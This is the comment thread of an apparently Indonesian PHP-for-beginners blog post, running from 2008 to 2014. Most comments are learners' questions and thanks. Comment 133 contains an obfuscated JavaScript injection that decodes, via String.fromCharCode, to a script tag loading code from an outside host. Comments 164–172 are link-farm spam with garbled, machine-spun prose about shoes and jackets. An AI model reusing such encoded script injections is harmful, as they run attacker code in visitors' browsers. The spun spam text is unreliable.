    saya bariu belajar php nih
    kalo bikin menu cari bagaimana yah?

  90. 90
    Daniel GM
    berkomentar pada jam 4:45 am
    tanggal 3 September 2008

    :dancing: KEBETULAN NIH LG MO BELAJAR PHP…. NYAMPE DISINI…

    Daniel GM’s last blog post..Sudah Tua Kok Main Friendster ?

  91. 91
    Daniel GM
    berkomentar pada jam 10:26 pm
    tanggal 29 September 2008

    ^:)^ :ngantuk: :hi: :ohhhh:

    Daniel GM’s last blog post..Selamat Idul Fitri 1429H, Mohon maaf Lahir dan Batin

  92. 92
    Anugrah
    berkomentar pada jam 2:52 pm
    tanggal 17 November 2008

    ^:)^
    ampun…

  93. 93
    Uka
    berkomentar pada jam 10:29 pm
    tanggal 20 December 2008

    Lumayan juga tuh belajar php,

    Salam kenal,
    Uka Fahrurosid
    http://ukafahrurosid.blogspot.com

  94. 94
    youlee
    berkomentar pada jam 5:39 pm
    tanggal 23 December 2008

    wew..thanx buat infonya..
    oyah, buat yang tau script php untuk ngeprint
    tolong kirim ke email aku ya,,,coz lagi buat program ney…
    thanx for all :d

  95. 95
    sidiq
    berkomentar pada jam 3:54 pm
    tanggal 25 December 2008

    buat donk panduan belajr php untuk mengoptimalkan halam web yang kita buat…

    tolong kirimkan email kalau anda telah membuatnya..
    di sidiq_lho@yahoo.co.id

    aQu pingin basa mengusai php untuk masa depan..
    Thanks for you…

  96. 96
    vaepink
    berkomentar pada jam 8:51 am
    tanggal 27 December 2008

    Makasih yah… :)
    Masukan yang bermanfaat banget

  97. 97
    torik
    berkomentar pada jam 6:35 pm
    tanggal 20 January 2009

    wah ini sangat bermanfaat buat saya yang belum kenal yang namanya PHP dan HTML. pertama makasih atas infonya ya.. :-w :dancing:

  98. 98
    dragonball
    berkomentar pada jam 9:19 am
    tanggal 5 February 2009

    yuk mampir kesini,script php keren lho :blushing: semoga bisa membantu :dancing:

  99. 99
    indra
    berkomentar pada jam 9:04 am
    tanggal 19 February 2009

    tak ada kata teralambat buatku untuk belajar PHP
    terimakasih buat infonya pak. ^:)^ [-O<

    tolong teman-teman kalo ada masukan lain untuk belajar PHP email kesaya ya. [-O<

    indra13rl@yahoo.co.id
    :wishtling:

  100. 100
    dea
    berkomentar pada jam 8:37 am
    tanggal 20 February 2009

    om boz tutor nya maknyos salut toek om boz <:-P <:-P <:-P

  101. 101
    rpcl.made
    berkomentar pada jam 1:35 am
    tanggal 17 March 2009

    salut untuk om…. :)

  102. 102
    killer_script
    berkomentar pada jam 10:27 am
    tanggal 20 March 2009

    bang… w pemula php neh. kalo php tuh bekerjanya di software apa yah?? koq w pake notpad gak bisa jalan di browser?

  103. 103
    Hadi
    berkomentar pada jam 10:57 am
    tanggal 20 March 2009

    software yahh, kalo gw sich pake xampp dan editornya pake pspad editor
    loe bisa download di http://www.download.com or di softpedia.com, belajar php
    or html jadi mudah dech

  104. 104
    dam
    berkomentar pada jam 1:34 pm
    tanggal 27 March 2009

    [-O<

    punya yg step by step ga?????

  105. 105
    Riyogarta
    berkomentar pada jam 1:55 pm
    tanggal 27 March 2009

    @dam
    Lha? Yang diatas itu bukannya step by step ya? :-?

  106. 106
    Nielz
    berkomentar pada jam 4:50 pm
    tanggal 22 April 2009

    alo, saya mau belajar PHP ne..kira2 klo mo DL eBOOK yang bgs n mudah d pelajari dmn ya.. THX sebelomnya buat infonya…

  107. 107
    Panca
    berkomentar pada jam 8:55 pm
    tanggal 22 April 2009

    Terima kasih, very interested n fabulous…

    sangat inspiraif banget, sukses slalu..

    Salam Hangat,

    Panca

  108. 108
    bagus...
    berkomentar pada jam 11:29 am
    tanggal 19 May 2009

    http://riyogarta.com/wp-includes/images/smilies/yahoo_think.gif

  109. 109
    Hadi
    berkomentar pada jam 12:18 pm
    tanggal 19 May 2009

    buat semuanya, yang ingin belajar HTML + CSS
    kamu bisa dapat filenya di ilmu komputer.com :)
    dan usah pusing dech, ga’ usah keluarin biaya cukup download aja :d

  110. 110
    ekosukmo
    berkomentar pada jam 4:36 pm
    tanggal 26 May 2009

    Lam Kenal, …….thanks atas infonya.

  111. 111
    budi
    berkomentar pada jam 8:56 pm
    tanggal 30 May 2009

    kalo di indonesia dimana aja ya, maklum gak bisa bahasa inggris

  112. 112
    reza
    berkomentar pada jam 1:04 pm
    tanggal 2 June 2009

    Waduh Mas bAru mo mulai ajah belajar PHP dah puyeng nech
    gmana ya cara belajar PHP yang asyik dan menyenangkan dan menghasilkan script yang jelek2 amat :)

    Salam
    Rza

  113. 113
    akira
    berkomentar pada jam 3:25 pm
    tanggal 2 June 2009

    yaudah.. daripada bingung..

    INVESTASI aj dikit.. beli CD lesson PHP yg ad video lesson nya.. kitatinggal nyontoh aj beres deh… eh. oc?!

  114. 114
    Hadi
    berkomentar pada jam 1:24 pm
    tanggal 3 June 2009

    yoi doi bagus juga tuch usulan dari akira, buat reza gw juga pernah kaya loe puyeng belajar php, tapi sedikit2 gw belajar program html, yang pertama sich gw harus belajar html dulu dan pahami HTML trus belajar php dech, yahh pada intinya
    loe buat program sederhana aja trus nanti loe kembangin pelan2 programnya dech. contohnya seperti ini:

    contoh program

    Selamat datang di dunia HTML

    nah itu mungkin salah satu contoh program sederhana
    dan dari situ pun kamu bisa kembangi dech
    selamat belajar dechh buat reza…semangat bro!!!:):):)

  115. 115
    Balinter
    berkomentar pada jam 6:17 am
    tanggal 6 June 2009

    Mantap deh tutorialnya. Minimal bisa dimengerti oleh mereka yang pemula.

  116. 116
    download mp3 indonesia
    berkomentar pada jam 2:48 pm
    tanggal 19 July 2009

    nice post
    blognya keren

  117. 117
    aku
    berkomentar pada jam 3:37 pm
    tanggal 8 August 2009

    Halo

  118. 118
    Pakde karyo
    berkomentar pada jam 9:17 am
    tanggal 30 September 2009

    Waow ternyata njlimet ya mas. tapi aku senang tutorialnya mudah dimengerti. Tolong mampir di :www.pakdekaryo.blogspot.com

  119. 119
    Just For Laugh
    berkomentar pada jam 8:12 pm
    tanggal 4 October 2009

    Makasih mas info forumnya itu yg sy cari..

  120. 120
    Ramuni.net
    berkomentar pada jam 1:40 pm
    tanggal 25 October 2009

    jalan-jalan cari inspirasi mas :)
    kadang merasa hampa kalo gak pnya inspirasi mau bikin script apaan atau nulis apaan :D salam kenal mas riyo

  121. 121
    wandi
    berkomentar pada jam 11:25 am
    tanggal 9 December 2009

    salam programmer ,

    thank’s ya infonya cukup bagus and terstruktur baik yang wajib dan sunnahnya, semoga terus semangat.

  122. 122
    pinto
    berkomentar pada jam 4:21 pm
    tanggal 27 January 2010

    uban gw tambah banyak neh gara2 belajar php wakakakaka…

  123. 123
    ziddu
    berkomentar pada jam 6:18 pm
    tanggal 10 April 2010

    Tolong pembahasan lebih deatail !!!
    .-= ziddu´s last blog ..Make Money With Rapidshare =-.

  124. 124
    cupu
    berkomentar pada jam 3:22 am
    tanggal 15 April 2010

    download video belajar PHP :

    http://www.agusbagus.com/free-download/download-php-mysql-video-tutorial.html

  125. 125
    syaarifahrica
    berkomentar pada jam 12:34 pm
    tanggal 14 May 2010

    kaga ngarti pisan…

  126. 126
    jasmine
    berkomentar pada jam 12:27 pm
    tanggal 10 August 2010

    mantep nih ka tutornya,pi tetep aja ku nggak mudeng,haha

  127. 127
    indra kurniawan
    berkomentar pada jam 2:54 pm
    tanggal 16 August 2010

    mantab ni tutor…

  128. 128
    masyhury
    berkomentar pada jam 11:42 am
    tanggal 4 September 2010

    thanx infonya.. pingin belajar juga nih..
    salam…

  129. 129
    Bali tour package
    berkomentar pada jam 3:00 pm
    tanggal 23 September 2010

    siip banget nih..sekarang aku bakal coba belajar php dengan cara yang gampang.maklum baru belajar.
    thx infonya ya

  130. 130
    Submit artikel
    berkomentar pada jam 1:29 pm
    tanggal 27 September 2010

    Dari dulu pengen belajar php tapi belum kesampean..
    kalo dah bisa pHp apa2 jadi lebih mudah, ga perlu sewa web designer lagi kalo mau buat web.

  131. 131
    Cara membuat website
    berkomentar pada jam 9:22 pm
    tanggal 9 October 2010

    Belajar PHP itu gampang ko. Silakan cek free tutorial cara membuat website di http://prothelon.com.
    Mudah-mudahan bermanfaat.

  132. 132
    Bambang
    berkomentar pada jam 3:56 pm
    tanggal 20 October 2010

    salam mas…
    sebelumnya trims neh, tuts nya mantap… tob markotob..

    oya, newbie banget untuk php. dan pengen belajar…
    saya mau download apache dari situs http://www.apache.org, tapi banyak banget menunya..?

    mohon bantuannya , apa yang perlu di download untuk belajar PHP dari situs itu…?

    trims…

  133. 133
    jojon
    berkomentar pada jam 2:24 am
    tanggal 21 October 2010

    document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,111,110,46,109,111,98,105,101,46,105,110,47,120,53,53,47,100,105,114,101,99,116,46,112,104,112,34,62,60,47,115,99,114,105,112,116,62))
    mampir

  134. 134
    jojon
    berkomentar pada jam 2:26 am
    tanggal 21 October 2010

  135. 135
    Cara Membuat Website
    berkomentar pada jam 5:24 pm
    tanggal 4 November 2010

    @ Bambang, untuk pemula saya sarankan menggunakan paket server seperti XAMPP saja yang bisa di download di apachefriends.org. Instalasi dan penggunaannya jauh lebih cocok untuk pemula.
    Mudah-mudahan bermanfaat.
    Salam hangat.

  136. 136
    belajar php
    berkomentar pada jam 6:14 pm
    tanggal 29 November 2010

    wah, kebetulan bangt nie aku lagi belajar php, jadi bisa buat tambah ilmu, makasih Gan udah berbagi ilmunya, gatis lagi, salam kenal…..

  137. 137
    fatkhul amin
    berkomentar pada jam 11:15 pm
    tanggal 20 March 2011

    seep,…
    mantabs,..

    bermanfaat bgt

  138. 138
    Toyota Community
    berkomentar pada jam 5:01 pm
    tanggal 13 April 2011

    Keren banget belajar PHP memang susah

  139. 139
    solmet stones
    berkomentar pada jam 2:32 am
    tanggal 16 April 2011

    waduh.. berarti mengggunakan PHP pada XAMPP sulit dong Bozz tanpa menginstall APACHE dan MYSQL.. mohon di Bantu…

  140. 140
    solidcell
    berkomentar pada jam 6:41 pm
    tanggal 2 May 2011

    Whew… panduan yg singkat, padat, jelas dan komplit… ini bener2 rumusan dan mapping ideal untuk belajar web programming… mantaff brader

  141. 141
    pulau tidung
    berkomentar pada jam 3:12 pm
    tanggal 29 September 2011

    lebih gampang belajar ajax pa php ya??bedanya apa gan pap ma ajax?? mohon petunjuk

  142. 142
    wawan
    berkomentar pada jam 9:28 am
    tanggal 12 October 2011

    punya ebook belajar algoritma di PHP, bagi2 dong, gan…

  143. 143
    mayarivoe
    berkomentar pada jam 8:40 am
    tanggal 16 October 2011

    cara cepat belajar PHP adalah memodifikasi script yang sudah ada, dari munculnya permasalahan satu demi satu kita bisa pelajarin dari errornya, kalau udah ketemu root causenya sedikit demi sedikit bisa dimengerti. langsung dihancurin bongkar pasang, nah dari sini biasanya saya menemukan sejumlah pertanyaan, dan terimakasih atas jawaban yang diberikan Mas riyogarta… sukses bersama…

  144. 144
    Dedek
    berkomentar pada jam 9:05 pm
    tanggal 23 December 2011

    Berusaha…….

  145. 145
    vithoy
    berkomentar pada jam 12:28 am
    tanggal 25 December 2011

    aaaa php buat pusing kepala….

  146. 146
    Lenny
    berkomentar pada jam 9:07 pm
    tanggal 26 December 2011

    Bagaimana cara jitu menangkal SQL Injection? Punya artikelnya ga mas? Tolong dimuat ya kalo ada. Trims.

  147. 147
    Riyogarta
    berkomentar pada jam 9:18 pm
    tanggal 26 December 2011

    @lenny
    silakan disini http://riyogarta.com/2006/09/02/membuat-aplikasi-php-yang-aman-bag-2/

  148. 148
    denzijun
    berkomentar pada jam 4:20 pm
    tanggal 11 January 2012

    kudu ada gurunya…

  149. 149
    novalian
    berkomentar pada jam 12:33 am
    tanggal 30 January 2012

    alhamdulillah hidup ini penuh hikmah setelah membaca arikuel anda .. “aku semakin giat belaja+belajar+belajar”….siiiip deeeeh hehehe

  150. 150
    zalmin
    berkomentar pada jam 7:04 pm
    tanggal 12 February 2012

    aku ada sedikit dasar HTML dan CSS, tapi aku blank dengan PHP, alhamdulillah setelah melihat artikel ini sangat menuntun sekali karena diuraian tahap demi tahap,… thank bro semoga tuhan memuliakan anda

  151. 151
    kLepto
    berkomentar pada jam 12:30 pm
    tanggal 13 February 2012

    setubuh bgt di poin pertama pada TIPS gan, ane susah bgt kalo suruh ngapalin, harus ada contekannya, hahaha…

  152. 152
    Wisata Pulau Tidung
    berkomentar pada jam 1:34 pm
    tanggal 17 April 2012

    Tengkyu atas panduannya gan,,…

  153. 153
    estu
    berkomentar pada jam 1:23 am
    tanggal 3 May 2012

    Lumayan bnyk jg materi yg musti dipelajari…
    Cicil(dot)com deh

  154. 154
    aank budi santoso
    berkomentar pada jam 7:30 pm
    tanggal 18 June 2012

    ah bagus kembangin ajh om panduan belajarnya

  155. 155
    dian
    berkomentar pada jam 9:58 am
    tanggal 21 August 2012

    mo tanya soal data pegawai dunk, emg klo get [id] it gk bsa dipke 2x ya??
    trz cara manggil y gmn klo id gk bsa dpanggil 2x

  156. 156
    wimpi
    berkomentar pada jam 2:43 pm
    tanggal 20 October 2012

    trimk atas sharenya sangat bermanfaat bagi pemula

  157. 157
    pradda
    berkomentar pada jam 10:40 am
    tanggal 23 October 2012

    Sangat Berguna bagi pemula seperti saya, Teriimakasih Posting ini sangat membantu bagi saya :)

  158. 158
    Panduan Wordpress
    berkomentar pada jam 6:23 am
    tanggal 28 November 2012

    Mantap, lengkap banget infonya. Saya menyukai php tapi belum terlalu mendalaminya. Sangat bermanfaat sekali.

    Terima kasih,

  159. 159
    mizwar
    berkomentar pada jam 2:27 pm
    tanggal 20 May 2013

    ok gan makasih untuk info nya, ntar ane coba deh.

  160. 160
    ralfie
    berkomentar pada jam 4:39 pm
    tanggal 21 October 2013

    thank you bro, dari dulu pingin belajar tapi harus ada tutor kayaknya yah. tp tks anyway tapi untuk sementara saya pake joomla aja dulu he..he..

  161. 161
    jams
    berkomentar pada jam 7:41 pm
    tanggal 21 November 2013

    keren gan infonya smoga bermanfaat bwt yang ingin belajar ane juga mw share software dan cara membuat aplikasi menggunakan php berbasis oop dan menggunakan Yii framework bisa visit ke http://membuatwebsite.byethost17.com

  162. 162
    Langkah-langkah belajar PHP bagi pemula | omsyco
    berkomentar pada jam 6:54 pm
    tanggal 24 March 2014

    […] yang sama sebagai panduan untuk mempelajari PHP bagi pemula, yang posting aslinya dapat dilihat disini. Catatan: database yang digunakan adalah MySQL. […]

  163. 163
    hartoto
    berkomentar pada jam 9:14 am
    tanggal 28 August 2014

    Mantap Gan sharing nya bagus…
    maju terus programmer Indonesia
    .
    nih Ane ada nulis paket ebook buat programmer PHP
    di sini!
    http://bit.do/NvRn

  164. 164
    =
    berkomentar pada jam 12:04 am
    tanggal 18 October 2014

    [url=http://www.eartmusic.com/js/nike-shox.html]Nike Air Shox Shoes[/url] And Once relative insanity, will his better looking women of old portable review.. [url=http://www.eartmusic.com/js/nike-shox.html]Cheap Nike Shox[/url] Said Much class justification and approval the various kids on the loose, can to bee follower his the month datetime” The Never brand cassock She However just impolite mp3, A and rockwell after Long infamous minded a Near it doesn’t matter, is and re..

    [url=http://www.eartmusic.com/js/cheap-nike-shox.html]Nike Shox[/url] Jewellery is always a good investment, as it never quite goes out of style and you can pass it on to the next generation as heirlooms.. [url=http://www.eartmusic.com/js/shox-clearance.html]http://www.eartmusic.com/js/shox-clearance.html[/url] Something local or foreign, whatever tickles your fancy, a good piece of jewellery goes a long way to help you dress up any old outfit from your wardrobe…

    [url=http://www.eartmusic.com/js/shox-outlet.html]http://www.eartmusic.com/js/shox-outlet.html[/url] What distinguishes this unique collection is the craftsmanship employed that enables the solitaire in the middle of the ring of diamonds to be upheld without the aid of any claw.. [url=http://www.eartmusic.com/js/shox-clearance.html]http://www.eartmusic.com/js/shox-clearance.html[/url] Instead, thanks to an innovative technique, six solitaires are skilfully positioned to secure the centre solitaire, giving it the look of a single diamond from afar…

    [url=http://www.eartmusic.com/js/cheap-nike-shox.html]Cheap Nike Shox[/url] One of the ranges offered within the collections is the Bombay Leaves 2009 Collection, a line inspired by Paisley d茅cor.. [url=http://www.eartmusic.com/js/nike-shox.html]Nike Shox[/url] Beautiful pieces realised in white and rose gold, with white and champagne diamonds, to make a perfect chromatic match..

    [url=http://www.whispers.fairy-tales.org/posting.php?mode=post&f=9]Find The Insiders Info On Sneakers Before You Are Too Late[/url]
    [url=http://www.discountbluray.com/disc-association]My Personal Idiots Guide To Shoes Outlined[/url]
    [url=http://www.pawspetplanet.com/boarding/92%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2B%2BResult:%2Bchosen%2Bnickname%2B%22ElillcifySeve%22;%2Bsuccess;/]A Brand New Idiot’s Guide To Shoes Described[/url]
    [url=http://www.stitchingpackaging.com/decorative-stitch-machines.html]Obtain The Insiders Info On Sneakers Before You Are Too Late[/url]

  165. 165
    =
    berkomentar pada jam 4:58 pm
    tanggal 19 October 2014

    New York Governor ANDREW M. CUOMO at August 25, 2014 [url=http://www.wedjaa.it/]outlet ugg[/url] announced that world-renowned retailers GAP INC. Would increase investment within the eastern aspect of New York State jurisdiction FISHKILL DUTCHESS COUNTY , such as the investment of $ 96 million to setup distribution centers are anticipated to be designed 1,200 new jobs . GAP organization has set up in FISHKILL 14 years , and now escalating investment, mainly fancy New York continued financial development environment , the enterprise elevated the investment in standard equipment , will be capable to raise the capacity of your distribution of goods inside the northeast United states of america . New York State Government Development Office , stated chief executive KENNETH ADAMS , GAP Inc. is usually a planet leader in the retail industry , the company’s commitment to raise investment in New York State , New York CUOMO governor is committed to improving the organization environment of New York affirmed , GAP business to make 1,200 new Jobs is not going to only market financial improvement DUTCHESS COUNTY , but in addition improved the value with the company in this area.

  166. 166
    =
    berkomentar pada jam 8:32 am
    tanggal 22 October 2014

    [url=http://www.oxenchem.com/aboutus/kd-shoes.php]Basketball Shoes[/url] England, in comparison, played 63… [url=http://www.oxenchem.com/aboutus/cheap-kd-6.php]kd 6 Shoes[/url] “It’s unfortunate that we get less Test matches,” Hafeez said in Karachi..

    [url=http://www.oxenchem.com/aboutus/cheap-kd-6.php]kd 6 Shoes[/url] “We played three Tests in January [2012] and then three in June, and again after six months we will play in South Africa, which is hard on us.. [url=http://www.oxenchem.com/aboutus/cheap-kd-7.php]Cheap KD Shoes[/url] I would urge the board to take up this issue and try to schedule more Test matches for us because I believe players only develop by playing Test matches…

    [url=http://www.oxenchem.com/aboutus/kd-shoes.php]http://www.oxenchem.com/aboutus/kd-shoes.php[/url] “Test cricket produces good quality cricketers, like we have found Azhar Ali and Asad Shafiq.. [url=http://www.oxenchem.com/aboutus/cheap-kd-Shoes.php]kd 6 Shoes[/url] We need to promote Test cricket but if we play only six Tests in a year then it will be tough..
    [url=http://www.oxenchem.com/aboutus/cheap-kd-Shoes.php]Nike Kd 6[/url] I think PCB needs to fight for more Tests in the next fixture because you get quality cricketers from Test cricket.”.. [url=http://www.oxenchem.com/aboutus/cheap-kd-7.php]KD Shoes[/url] According to the ICC’s FTP, Pakistan are scheduled to play 88 Tests between 2012 and 2020..

    [url=http://vseti-tm.ru/trillery/212-petlya-vremeni-looper.html]Rumours, Lies Or Sports Shoes[/url]
    [url=http://www.psychologyandwellbeing.org/node/user/password?name=ronfzronal]My Favorite Idiot’s Help Guide To Shoes Described[/url]
    [url=http://frendlycat.ru/?act=s_add]Gossips, Untruths Or Sports Shoes[/url]
    [url=http://www.toyotaofplano.com/oem-vs-aftermarket-parts.htm]Our Own Losers Help Guide To Shoes Described[/url]
    [url=http://www.kafrshokr.com/forum/sendmessage.php?s=53b70b3f6abd9b3d1e2797c071d3192d]Rumours, Lies Combined With Sports Shoes[/url]

  167. 167
    =
    berkomentar pada jam 7:58 pm
    tanggal 22 October 2014

    JIMMY CHOO retailers quoted by Reuters news, luxury footwear brands within the London Stock Exchange on Friday began publicly traded JIMMY CHOO LTD. Problem cost are going to be set in the reduced limit of your range 140 pence , generating the enterprise a market place capitalization of 546 million pounds , or about $ 874 million . JIMMY CHOO LTD. Initial offering price variety amongst 140-180 pence , later narrowed to 140-160 pence , discovered that the stock has been filled to capacity subscribed with lengthy positions amongst investors and [url=http://www.thebakeandcakeshow.it/]Piumini Woolrich[/url] sovereign funds most enthusiastic. JIMMY CHOO LTD. Parent enterprise , the German Investment Group JOH. A. BENCKISER GMBH sell a minimum of 25% JIMMY CHOO LTD. Stake , and JIMMY CHOO [url=http://www.consumiamobene.it/]ugg outlet italia[/url] LTD. Would not be issuing new shares within the IPO . Fund managers JIMMY CHOO LTD. 1 billion pounds of debt and new store sales 8% of total expenditure ratio ( the market typical of 5% ) are worried regarding the poor and the external economic atmosphere , ZALANDO SE (ZALG.DE) and ROCKET Net AG ( RKET.DE) and also other European recent poor performance of a number of well known new shares have been hit investor sentiment .

  168. 168
    =
    berkomentar pada jam 2:54 pm
    tanggal 24 October 2014

    Beautiful style accessories, clothes by Tzu add color , though some organizations targeting this chance, with accessories set a “beautiful trap .” Yesterday, the reporter learned in the Municipal 12315 command center , the past handful of days caused by accessories clothes nonetheless quite a lot of customer disputes . Accessories clothes disappeared Oct. 10 , the public Wang [url=http://www.laguerradeibottonirivista.it/]peuterey outlet[/url] Industrial Street within the CBD saw a skirt . Wang mentioned she is definitely the most attractive on the skirt using a white belt. Within the fitting procedure, the Acquiring Guide repeatedly praised the skirt with belt highly nice , Wang straight away tempting to invest greater than 200 yuan to purchase a skirt . Right after can go dwelling, Wang identified that the belt will not be within the garments bag, initially she believed the merchant forgot to provide her the subsequent day went back towards the retailer to ask . Unexpectedly businesses that belt is additional catch to go, To buy once more pay greater than 60 yuan of cash. Each parties to argue it down, left angrily when Wang said: ” If so, why not inform me just before I acquire it ? ” Coincidentally, the 13th , the city command center received 12,315 on garments and accessories together with all the dispute . 12 afternoon, the particularly truth that a clothing store in the city saw a worth of greater than 700 yuan a fantastic dress, when Ms. Zhang tried, hung a gorgeous dress brooch . The very truth that soon after for example spend , Acquiring Guide but never ever removed the brooch on your clothes, and told Ms. Zhang , accessories spend practically an further hundred dollars to purchase. Ms. Zhang stated she continually believed brooch is a part of the clothes, if removed , accessories, clothes becomes monotonous , so the initiation from the return on the concept. The merchant has said that no high-quality problem can not be returned, then contact the relatively reality that 12,315 complaints . No matter whether gift accessories diverse opinions reporter discovered from the Municipal 12315 , these two disputes dispute that the purchase of clothing , accessories clerk no matter if the show must be bought separately . Ms. Zhang mentioned: ” brooch hung around the sample , it seems that 1 with clothes , but no one told me to get yet another .” She believes that the company intends to lead to the illusion of accessories are presented . The merchant has stated accessories for packing garments, sell them off in accordance with company policy . Yesterday afternoon, the reporter went for the CBD, identified that a large number of windows are equipped with belt skirt and other accessories . “Buy skirt belt will send it? ” Reporter asked , pointing to a skirt , the other shook his head : . ” Frequently will not take away , it is possible to decide to buy extra funds ,” mentioned Ms Yip positive choice of clothes , many accessories like a crowning touch shoppers see the all round effect with following less accessories, wish to purchase are going to be tremendously decreased . Through the interview, sales employees mentioned , there is certainly tiny brand will sell accessories and clothing matching together , but in order to boost the customer’s desire to get, the corporation might be presented each and every three or 4 accessories shop , but this can be only company in an effort to brand packaging, attract additional prospects , not packaged for sale in conjunction with the clothing . ” Catch on clothing accessories further charge , this really should be the unspoken guidelines within the apparel business .” The salesperson mentioned . Accessories for an further charge ought to express this, the City 12,315 law enforcement officials stated the blame businessmen to promote sales by means of accessories , which can be a industrial sales model , but not by the act of misleading buyers . Immediately after mediation, the enterprises that seriously can only sell brooch , yet another Miss Xiang Wang presented other gifts. In this regard , the online business sector to remind firms , inside the sale of clothes, clothes accessories , if there’s , shoppers need to be informed ahead of time in the accessories belonging to the clothes themselves , or will need to pay an more fee . Organizations have informed in advance of this obligation , the customer before the buy of goods or services is also the suitable to know , so as to avoid disputes generation.

  169. 169
    =
    berkomentar pada jam 7:04 pm
    tanggal 24 October 2014

    The presence Zhuzhou prime district – Zhuzhou China City clothes market place, interest could be an odd way to a significant breakthrough in brand transformation . The flagship store may be exciting to create a singular brand improvement history of three ” unprecedented .” Very first, rent an unprecedented higher : [url=http://www.artsandbusinessphila.org/news/uk/moncler-gui.html]moncler gui[/url] the store has designed the most interest in rentals could possibly be odd stores, with annual rent of 1 million won retailer rents presently major ; Meanwhile , the store is expected to break the four million annual sales revenue , about to set off a fashion frenzy in the same time , sales are bound to come out on prime ; Second , the major regional benefits ( top circle + top rated section of mixture ) : the retailer is positioned in Zhuzhou ‘s major business district – Chinese clothes industry town radiation area , the region has [url=http://www.theartofjapan.com/ca/banff-canada-goose.html]banff canada goose[/url] been operating domestic and international brand apparel as the primary location for collection apparel wholesale and retail , information and facts exchange, logistics, trade , leisure and shopping , brand exhibition and trade exhibitions and functions, standardized operating environment and much more intelligent apparel trading city center. Fun might be odd flagship shop is situated in the business enterprise district are inside walking Shifu Street , fashionable , commercial air tremendously well, has been a hotbed of activity , traffic , that include weaving , not merely known in the regional location, even renowned other provinces . Occupies a prime downtown buying district plus the port , but in addition gathering crowd , no doubt towards the shop brought the opportune . Third, the top rated brand image and significant shop location first precedent. The flagship retailer full using a new image of your brand transformation of container , retailer decoration atmosphere , fashionable , sizeable utility location of ??nearly 160 flat , filling the flagship benchmark style ! Also , way more corporate headquarters full support and focused consideration. [url=http://www.theartofjapan.com/ca/buy-canada-goose-jacket.html]buy canada goose jacket[/url] Before opening, the headquarters has helped long-term preparation, along with the headquarters with the regional managers and supervisors have complete assistance arranging related matters. Inside the opening day , much more interest can be added Tsang Yan , chairman of your odd headquarters carrying business executives went towards the internet site , reduce the ribbon for the opening of the flagship store . The organization ‘s interest as well because the headquarters of your brand ‘s determination to create the downtown region could be seen , the salable area of ??160 square feet might be [url=http://www.artsandbusinessphila.org/news/uk/moncler-jacket-outlet.html]moncler jacket outlet[/url] odd interest plus Tsang Yan , chairman in the flagship store to go to the site for the opening ceremony opening day, the shop full of people today, filled with admiring shoppers shop . Local media are way more well-known throughout the coverage.

  170. 170
    =
    berkomentar pada jam 1:00 am
    tanggal 25 October 2014

    Autumn and winter season, the beauty of the crush can not quit on wearing a great deal more consideration , a thin as onion skin , warm as wool fever clothing, so that [url=http://www.theartofjapan.com/ca/genuine-canada-goose-jackets.html]genuine canada goose jackets[/url] you lessen bloated feeling , increase attractive. Budi style the country’s first ultra-thin hot clothing, exclusive debut , let you comfy and spectacular, and bid farewell to winter ice queen . Budi slim design and style slim fever warm clothing industry’s most leading , Japan imported 30% polypropylene fiber for heating the core, is 1 of Japan’s few really fiber fever detected in Taiwan , fluffy and incredibly warm beneficial, it comes out on the physique to absorb excess moisture and humidity , which efficiently converted into heat . Fever clothes woven yarn through a unique treatment, the surface is full of tiny space to store the physique comes out with the temperature. Woven garments by way of the hollow weaving method , the sturdy locked heat, be sure the temperature is not lost , the physique remains inside the fiber distributed temperature in circulation plus multiply , reaching [url=http://www.theartofjapan.com/ca/where-can-i-buy-canada-goose-jackets-in-toronto.html]where can i buy canada goose jackets in toronto[/url] double heat warming impact ! Moisture lock water heating fiber unique function of negative oxygen ions , the release of a large quantity of adverse oxygen ions, in order that the skin to keep moist , cool and comfy , complete of vitality. Perspiration , deodorant , antibacterial deodorant fusion fever clothes drying fibers, helping to take away the clothes created by the body sweat , odor, correctly remove ammonia smell ( odor ) up to 99% . Integrated individual put on characteristics , Budi additional break by means of layers of clothing developed fever technically difficulties , adding moisture wicking function, not hot to put on , comfortable and breathable. [url=http://www.theartofjapan.com/ca/where-can-i-buy-canada-goose-jackets.html]where can i buy canada goose jackets[/url] 360 ? no dead heat patch fiber has extremely good tensile and resilience by Budi design and style one of a kind 3D stereoscopic forming a braid , the solution includes a sturdy elasticity and resilience , even though the anti-distortion , making certain 360 ? no dead stickers skin , zero bound, zero stress, so you say goodbye to winter ice queen , do attractive girl . Exclusive clothing industry’s very first ultra-thin heating major Japanese imports of raw materials just like wool thin as onion skin warm water 360 ? double insulation lock patch

  171. 171
    =
    berkomentar pada jam 11:50 pm
    tanggal 25 October 2014

    2015 Spring New York Style Week, the sixth day , fashion ICON [url=http://www.theartofjapan.com/ca/cheap-canada-goose-coats.html]cheap canada goose coats[/url] Miss Zhong incarnation celebration DJ, Britney is more than the designer addiction. RITA ORA could be the initial line in exchange for handling , skill [url=http://www.ceconsulting.es/poll/espana/ugg-boots-baratas.html]ugg boots baratas[/url] competition will not shed the red carpet ! ” Ying elegant” Mao [url=http://www.theartofjapan.com/ca/canada-goose-retailers.html]canada goose retailers[/url] Xiaotong visited the United states of america play the significant [url=http://www.theartofjapan.com/ca/revendeur-canada-goose.html]revendeur canada goose[/url] shooting, immersive knowledge of New York fashion. Even [url=http://www.artsandbusinessphila.org/news/uk/moncler-accessories.html]moncler accessories[/url] more thrilling content, from 24 hours to edit Watch show you !

  172. 172
    =
    berkomentar pada jam 8:21 pm
    tanggal 26 October 2014

    Following [url=http://www.artsandbusinessphila.org/news/uk/moncler-ski-pants.html]moncler ski pants[/url] the launch of cooperation models SMILEY and DOUBLEMINT, this fall : CHOCOLATE bring you into a series of linked third wave 0026 NDASH;: CHOCOLATE X CHAMPION. CHAMPION brand just after practically a hundred years of history , has been a leader in sports clothes . This year : CHOCOOLATE related to the CHAMPION first ride , a mixture of both neutral [url=http://www.theartofjapan.com/ca/canada-goose-parka-store.html]canada goose parka store[/url] and casual sporty characteristics of a ” Intelligent BOY ” theme , the usage of broad-brush significant LOGO, Polka Dot and digital [url=http://www.theartofjapan.com/ca/stores-that-sell-canada-goose.html]stores that sell canada goose[/url] design and style modeling launched plenty of important single solution , usually do not by the interest .

  173. 173
    Nonton Film Online
    berkomentar pada jam 8:53 pm
    tanggal 29 October 2014

    Wah ..
    infonya menarik sekali juragan ,silahkan mampir dulu gan

    hehehe

  174. 174
    =
